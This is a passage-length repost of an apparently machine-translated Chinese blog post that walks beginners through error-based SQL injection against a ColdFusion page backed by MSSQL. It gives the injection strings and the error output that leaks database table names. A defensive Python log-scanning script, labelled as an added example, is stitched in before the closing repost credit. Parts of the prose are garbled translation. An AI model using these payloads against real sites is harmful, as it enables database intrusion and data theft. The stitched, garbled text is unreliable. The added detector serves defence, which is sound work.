An attack instance for CFM

zhaozj2021-02-16  83

Feeling pretty down, with exams coming up soon, so I went online. When I reach an address like this one, I habitually check whether it has a security vulnerability:

    http://www.test.com/openaccess/index.cfm?id=11

Submit:

    http://www.test.com/openaccess/index.cfm?id=11;

It returns an error:

    Error Occurred While Processing Request
    Error Diagnostic Information
    ODBC Error Code = 37000 (Syntax error or access violation)
    [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.
    The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (72:57).
    Date/Time: 06/05/04 13:37:57
    Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Remote Address: 61.178.21.189
    Query String: id=11;

CFM attacks are actually as simple as ASP ones; look at the information returned above, which is more than ASP returns. But it seems that very few people write about CFM, so I wrote this. The database above is MSSQL, so many methods can be used; for the benefit of the many beginner enthusiasts, I will only talk about how to "explode" it. Everyone is very familiar with the "across COOL" of ASP, so now let's COOL CFM!!

Submitted:

    And 0=(Select Count(*) from master.dbo.sdatabases where name>1 and dbid=6)

Depressing: it did not return what we expected. Since it won't give it to me, I will change the method and come back.

Submitted:

    And%201=(SELECT%20top%201%20NAME%20FROM(SELECT%20top%2012%20ID,Name%20FROM%20SysObjects%20where%20XTYPE=CHAR(85))%20T%20DESC)

It returns:

    Error Diagnostic Information
    ODBC Error Code = 22005 (Error in assignment)
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ANALYST_MST' to a column of data type int.
    The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (50:2) to (50:51).
    . . . . . .

See that? Haha, Xiaozhu's statement is fierce! Now check one at a time: change the 1 in TOP%201%20Name, starting from 1; at 6 it returns something expected. . . . . . .
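Seen from the defender's side, the requests above leave clear traces in a web access log. The following added example (not part of the original post) flags them: a non-integer value in a parameter the application treats as a number, SQL metadata keywords in a parameter, and a 5xx response to such a request. The simplified log format, the sample lines and the NUMERIC_PARAMS list are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumed simplified log format: client "METHOD target HTTP/x.y" status
LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})$')
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application uses as integers
SQL_TOKENS = re.compile(r"\b(select|union|sysobjects|sysdatabases|master\.dbo)\b", re.I)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 "GET /openaccess/index.cfm?id=11 HTTP/1.1" 200',
    '198.51.100.7 "GET /openaccess/index.cfm?id=11; HTTP/1.1" 500',
    '198.51.100.7 "GET /openaccess/index.cfm?id=11%20and%201=(select%20top%201'
    '%20name%20from%20sysobjects) HTTP/1.1" 500',
    '203.0.113.9 "GET /openaccess/index.cfm?id=42&lang=en HTTP/1.1" 200',
]

def query_params(target):
    """Yield decoded (name, value) pairs; ';' is deliberately not a separator."""
    for pair in urlsplit(target).query.split("&"):
        name, sep, value = pair.partition("=")
        if sep:
            yield unquote(name).lower(), unquote(value)

def findings(line):
    """Return the reasons a log line looks like SQL injection probing."""
    m = LINE.match(line)
    if not m:
        return ["unparsed"]
    _client, target, status = m.groups()
    reasons = []
    for name, value in query_params(target):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,10}", value):
            reasons.append(f"non-numeric {name}")
        if SQL_TOKENS.search(value):
            reasons.append(f"sql keyword in {name}")
    # A 5xx on a suspicious request suggests the input reached the database.
    if reasons and status.startswith("5"):
        reasons.append("server error returned")
    return reasons

def scan(lines):
    """Map line index -> reasons, for lines with at least one finding."""
    return {i: r for i, line in enumerate(lines) if (r := findings(line))}

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG).items():
        print(idx, reasons)
```

The same integer check applied at the application boundary, together with bound query parameters and suppressed diagnostic output, removes both the injection point and the error details the post relies on.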

When reposting, please credit the original address: https://www.9cbs.com/read-15822.html
